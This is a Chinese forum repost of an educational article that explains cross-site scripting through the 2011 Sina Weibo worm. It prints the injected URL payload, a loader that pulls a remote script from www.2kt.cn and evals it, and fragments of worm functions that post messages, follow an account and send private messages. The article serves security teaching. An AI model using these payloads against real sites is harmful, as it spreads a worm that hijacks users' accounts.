免费注册 查看新帖 |

Chinaunix

  平台 论坛 博客 文库
最近访问板块 发新帖
查看: 1690 | 回复: 1
打印 上一主题 下一主题

XSS-从weibo蠕虫事件学习 [复制链接]

论坛徽章:
0
跳转到指定楼层
1 [收藏(0)] [报告]
发表于 2012-03-11 22:48 |只看该作者 |倒序浏览
XSS-从weibo蠕虫事件学习





XSS攻击:跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆。故将跨站脚本攻击缩写为XSS。XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。



Xss的例子(以新浪微博的6.9的hellosamy蠕虫事件为例):



sina的名人堂页面页面上存在这么个链接

<a href="http://weibo.com/pub/star/g/123">这个是xss</a>



其实在服务器端是这么写的(猜测,真实代码长啥样不知道,但是一定是忘记做转义就输出了):

Echo '<a href="http://weibo.com/pub/star/g/{$uname}">这个是xss</a>'



其中uname并没有做htmlspecialchars。相当于是直接由用户输入,然后输出在页面上了。

这样的html就是存在xss漏洞



好了,这个漏洞被发现了,下面要利用它做什么呢?

1 将uname设置成xyyyd%22%3E%3Cscript%20src=//www.2kt.cn/images/t.js%3E%3C/script%3E?type=update

这样这个url就变成了



其中的引号被封闭了,然后这个页面自动运行了一段js脚本



这个js脚本做了这样的事情:

1 发送一个微博(这个是之所以成为蠕虫的原因,这个微博中附带着同样的一个连接)

2 加关注uid为2201270010

3 发私信,向好友传播链接



js的下载代码在http://www.stwind.org/wp-content ... 28_sina_XSS.txt.zip


  1. ?



  2. 1234567891011

  3. try{ x="g=document.createElement('script');g.src='http://www.2kt.cn/images/t.js';document.body.appendChild(g)";window.opener.eval(x); } catch(e){} main(); var t=setTimeout('location="http://weibo.com/pub/topic";',5000);
复制代码
其中就是在打开的页面加入了<script节点>,并执行

main中是发送微博,加关注,发私信三个动作

当5000秒后,当前页重新定位到public/topic上




  1. ?



  2. 123456789101112131415161718192021222324252627

  3. function main(){ try{ publish(); } catch(e){} try{ follow(); } catch(e){} try{ message(); } catch(e){} }
复制代码
比如



  1. ?



  2. 123456789

  3. function publish(){ url = 'http://weibo.com/mblog/publish.php?rnd=' + new Date().getTime(); data = 'content=' + random_msg() + '&pic=&styleid=2&retcode='; post(url,data,true); }
复制代码
模拟post请求,由于这个js是在weibo网页上调用的,所以就没有跨域问题



直接post就可以产生这个效果





注:这次事件中还用到了短链接服务

短链接服务能自定义用户链接,比如http://weibo.com/xyyyd%22%3E%3Cs ... ript%3E?type=update

这么长一个链接能变为http://t.cn/atmcqn

这样能增加用户的点击成功率



事实证明,建站是需要非常小心的,每个页面,每个输出,如果有一两个漏洞,都可能造成全站的大灾难!!引以为戒!



相关有用的链接地址:

http://soft.yesky.com/security/156/30179156.shtml

http://www.youxia.org/2011/12/XSS-RootKit.html

http://www.youxia.org/2010/04/Anti-XSS.html

http://blog.sina.com.tw/gn005021 ... &entryid=604456



----------------------

作者:yjf512(轩脉刃)

出处:http://www.cnblogs.com/yjf512/

本文版权归yjf512和cnBlog共有,欢迎转载,但未经作者同意必须保留此段声明

论坛徽章:
0
2 [报告]
发表于 2012-03-11 22:49 |只看该作者
谢谢分享
您需要登录后才可以回帖 登录 | 注册

本版积分规则 发表回复

  

北京盛拓优讯信息技术有限公司. 版权所有 京ICP备16024965号-6 北京市公安局海淀分局网监中心备案编号:11010802020122 niuxiaotong@pcpop.com 17352615567
未成年举报专区
中国互联网协会会员  联系我们:huangweiwei@itpub.net
感谢所有关心和支持过ChinaUnix的朋友们 转载本站内容请注明原作者名及出处

清除 Cookies - ChinaUnix - Archiver - WAP - TOP